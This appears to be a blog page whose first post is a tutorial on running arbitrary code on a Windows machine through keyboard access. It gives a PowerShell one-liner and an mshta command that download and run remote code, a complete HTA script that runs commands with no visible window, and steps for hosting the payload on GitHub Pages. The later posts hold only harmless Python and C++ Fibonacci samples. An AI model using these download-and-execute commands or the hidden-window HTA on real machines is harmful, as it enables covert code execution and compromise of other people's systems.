Hello, cybersecurity enthusiasts and researchers!
In this post we'll explore a simple yet powerful in some situations way how one may run arbitrary code on your machine by utilizing trusted well-known websites and basic windows mechanisms.
Let's start by figuring out what's the quickest way to grab and execute payload from the web on a Windows machine that has only out the box apps and tools (since such approach significantly increases chances of successful execution). If we assume that the access is presented in a form of keyboard input (and the image from the monitor as feedback, optionally) - the best way is, of course, running some sort of a command.
The data needs to be retrieved from the web, thus two options - IP or URL. The URL approach is much easier because the URL can be a set of simple words unlike random digits of the IP, let alone complications of aquiring a private IP and hosting the payload manually.
So the task then is - to download and execute the payload using a command. Powershell may be a obvious solution but it's not the best - it needs to do the downloading and execution steps separately. If powershell 3.0+ is available the shortest way (as far as I know) would be -
iex (iwr 'https://the-url.com').ContentBut there's much better tool for this - mshta.exe. Shortly - it allows running HTML Application (hereinafter - HTA) programs on windows. Don't let the HTML confuse you - it's an application, thus it has pretty extensive possibilites. Because of the intended use-case of the tool it supports running things straight from the url, so the exact same can be achieved with just -
mshta https://the-url.comThe url would need to lead to a proper HTA script, of course, but that's not a big deal as you'll see later.
One more time-saving possibility lies in running the command - we don't need to open a command prompt. The Win+R shortcut opens a window that can handle our command just fine, so it's worth remembering. Now, to the HTA formatting part. Here's a simple HTA code that can run cmd commands without visible windows opening
<html>
<head>
<hta:application id="htaApp" applicationname="MyApp" border="thin" />
<script type="text/javascript">
var sh = new ActiveXObject('WScript.Shell');
sh.Run('cmd.exe /k timeout 3 & curl parrot.live');
window.close();
</script>
</head>
<body></body>
</html>
The command can be any sorts of things, in this example - showing a colorful parrot after 5 seconds. The delay is to show that the command keeps running in the background without giving away it's presence.
About hosting - the content of the url must be the raw code, without watermarks from hosting providers. As for the time of writing this article, these options may be used -
firebase github pages nekoweb.org neocities.orgYes, since static website is enough - nekoweb and the neocities itself are capable of serving our payload. In this article I'm using github pages. Quick guide:
1. Create github account, preferably with short username
2. Create a repository with readme file. Set the name to - YourUsername.github.io (naming the repo like this is crucial. Github will recognize that and automatically convert the repo to a github pages one, and it will be accessible on https://YourUsername.github.io, otherwise the link will look like this - https://YourUsername.github.io/repo_name
3. Rename the readme file to index.html (so you don't have to push that file with Git)
4. Copy and paste the HTA script to this html file. Give github some time to process your commit.
No AI was used to write the text of the article (code not included)
The second one here!
This post should be an article about one interesting (or not) algo but I want to optimize it before publishing. Because rn it sucks. If Ill fail to do that maybe Ill post the beta version
text and new text
from the new line
Code Example (Python)
def hello_world():
print("Hello, World!")
# Call the function
hello_world()
# This is a longer example to demonstrate collapsing
def fibonacci(n):
"""Calculate the nth Fibonacci number"""
if n <= 0:
return 0
elif n == 1:
return 1
else:
a, b = 0, 1
for _ in range(2, n + 1):
a, b = b, a + b
return b
# Generate the first 10 Fibonacci numbers
for i in range(10):
print(f"Fibonacci({i}) = {fibonacci(i)}")
Code Example (C++)
#include <iostream>
#include <vector>
int main() {
std::cout << "Hello, World!" << std::endl;
// This is a longer example to demonstrate collapsing
std::vector<int> fibonacci(15);
fibonacci[0] = 0;
fibonacci[1] = 1;
std::cout << "Fibonacci Series:" << std::endl;
std::cout << fibonacci[0] << " " << fibonacci[1] << " ";
for(int i = 2; i < 15; i++) {
fibonacci[i] = fibonacci[i-1] + fibonacci[i-2];
std::cout << fibonacci[i] << " ";
}
std::cout << std::endl;
return 0;
}